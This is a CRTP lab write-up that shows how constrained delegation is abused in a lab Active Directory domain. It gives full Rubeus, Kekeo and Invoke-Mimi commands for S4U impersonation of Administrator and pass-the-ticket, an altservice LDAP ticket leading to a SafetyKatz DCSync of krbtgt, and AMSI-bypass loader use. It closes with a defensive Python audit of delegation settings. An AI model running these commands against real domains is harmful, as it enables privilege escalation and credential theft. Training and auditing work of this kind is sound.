CRTP Lab 16

Task 1

Enumerate users in the domain for whom Constrained Delegation is enabled.

  • For such a user, request a TGT from the DC and obtain a TGS for the service to which delegation is configured.

  • Pass the ticket and access the service

Use InviShell and PowerView to enumerate users with constrained delegation enabled.

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

PS C:\Users\student372> . C:\AD\Tools\PowerView.ps1


PS C:\Users\student372> Get-DomainUser -TrustedToAuth

websvc has constrained delegation enabled. Since we already have the websvc credentials (its AES256 key), we can use them to access CIFS/dcorp-mssql as a domain admin.

Using the websvc key, we request a TGS for websvc impersonating the domain admin (first hop). This TGS is then used to obtain the ticket for the CIFS service.

Abuse with Rubeus

We use the websvc AES256 key to request a TGS as Domain Administrator from the KDC and import it into the current session.

# %Pwn% holds the ArgSplit output for "s4u"

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:websvc /aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7 /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL" /ptt

klist

Now we can access the CIFS service

C:\Windows\system32>dir \\dcorp-mssql.dollarcorp.moneycorp.local\c$

Abuse with Kekeo

Request a TGT from websvc.

C:\Windows\system32>cd C:\AD\Tools\kekeo\x64

C:\AD\Tools\kekeo\x64>.\kekeo.exe

kekeo # tgt::ask /user:websvc /domain:dollarcorp.moneycorp.local /aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7

We can use this TGT to request a TGS. We are requesting TGS to access CIFS/dcorp-mssql as DA.

kekeo # tgs::s4u /tgt:TGT_websvc@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:cifs/dcorp-mssql.dollarcorp.moneycorp.LOCAL

Since the ticket is stored in a file, we can inject it into the current session to use it. Open InviShell, import Invoke-Mimi and pass the ticket.

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

. C:\AD\Tools\Invoke-Mimi.ps1

Invoke-Mimi -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_cifs~dcorp-mssql.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL.kirbi"'

We can now access the CIFS service.

C:\AD\Tools\kekeo\x64>dir \\dcorp-mssql.dollarcorp.moneycorp.local\c$

Task 2

Enumerate computer accounts in the domain for which Constrained Delegation is enabled.

  • For such a computer account, request a TGT from the DC.

  • Obtain an alternate TGS for LDAP service on the target machine.

  • Use the TGS for executing DCSync attack.

We use InviShell and import PowerView to find computer accounts with constrained delegation.

# InviShell and AMSI bypass, then PowerView:
PS C:\AD\Tools\kekeo\x64> . C:\AD\Tools\PowerView.ps1

# Enumerate Computers with Constrained Delegation enabled
PS C:\AD\Tools\kekeo\x64> Get-DomainComputer -TrustedToAuth

dcorp-adminsrv has constrained delegation enabled. Since we have the AES keys of dcorp-adminsrv$, we use Rubeus to impersonate the Domain Admin.

# ArgSplit for s4u
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args s4u /user:dcorp-adminsrv$ /aes256:e9513a0ac270264bb12fb3b3ff37d7244877d269a97c7b3ebc3f6f78c382eb51 /impersonateuser:Administrator /msdsspn:time/dcorp-dc.dollarcorp.moneycorp.LOCAL /altservice:ldap /ptt

To abuse the LDAP ticket we just imported, we use DCSync to dump the secrets.

# Notice that the service name in the ticket is not encrypted, so it can be replaced: instead of TIME (the configured SPN) we requested LDAP with /altservice. HTTP would work as well.
# %Pwn% holds the ArgSplit output for lsadump::dcsync

C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "%Pwn% /user:dcorp\krbtgt" "exit"
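An added defensive audit to go with the enumeration in Task 1 and Task 2 (not part of the lab or of PowerView/Rubeus): it reads the same two LDAP attributes that Get-DomainUser/Get-DomainComputer -TrustedToAuth rely on (userAccountControl and msDS-AllowedToDelegateTo) and, because the service name in the ticket is not protected, reports every host a delegating account can effectively reach, flagging any account that can delegate to a DC. The records and the DC list are constructed to mirror the lab objects.

```python
# Constrained-delegation exposure audit (added example). Records would normally
# come from an LDAP export; these are constructed to match the lab's accounts.
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000   # protocol transition ("TrustedToAuth")
TRUSTED_FOR_DELEGATION = 0x80000             # unconstrained delegation

# Constructed sample records (sAMAccountName, userAccountControl, msDS-AllowedToDelegateTo)
SAMPLE_RECORDS = [
    {"sAMAccountName": "websvc", "userAccountControl": 0x1000200,
     "msDS-AllowedToDelegateTo": ["CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL",
                                  "CIFS/dcorp-mssql"]},
    {"sAMAccountName": "dcorp-adminsrv$", "userAccountControl": 0x1001000,
     "msDS-AllowedToDelegateTo": ["time/dcorp-dc.dollarcorp.moneycorp.LOCAL",
                                  "time/dcorp-dc"]},
    {"sAMAccountName": "student372", "userAccountControl": 0x200,
     "msDS-AllowedToDelegateTo": []},
]
# Constructed list of domain controller host names (short and FQDN, lower case).
DOMAIN_CONTROLLERS = {"dcorp-dc", "dcorp-dc.dollarcorp.moneycorp.local"}


def exposed_hosts(spns):
    """Hosts reachable through the configured SPNs. The ticket's service name is
    not encrypted, so one SPN on a host (time/dcorp-dc) exposes every service
    on that host (ldap/, cifs/, http/ ...); only the host part matters."""
    hosts = set()
    for spn in spns:
        parts = spn.split("/")          # class/host[:port][/instance]
        if len(parts) < 2:
            continue
        hosts.add(parts[1].split(":")[0].lower())
    return hosts


def audit(records, dcs=DOMAIN_CONTROLLERS):
    """Return one finding per account that has any form of delegation."""
    findings = []
    for r in records:
        uac = r["userAccountControl"]
        targets = r.get("msDS-AllowedToDelegateTo", [])
        unconstrained = bool(uac & TRUSTED_FOR_DELEGATION)
        if not targets and not unconstrained:
            continue                     # no delegation configured
        hosts = exposed_hosts(targets)
        findings.append({
            "account": r["sAMAccountName"],
            "protocol_transition": bool(uac & TRUSTED_TO_AUTH_FOR_DELEGATION),
            "unconstrained": unconstrained,
            "exposed_hosts": sorted(hosts),
            # Reaching a DC with protocol transition means an LDAP ticket, i.e. DCSync.
            "dc_exposed": bool(uac & TRUSTED_TO_AUTH_FOR_DELEGATION) and bool(hosts & dcs),
        })
    return findings
```

Run `audit(SAMPLE_RECORDS)` on a real export to get the list of accounts whose delegation settings should be reviewed or moved to resource-based constrained delegation; any finding with `dc_exposed` set deserves immediate attention.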
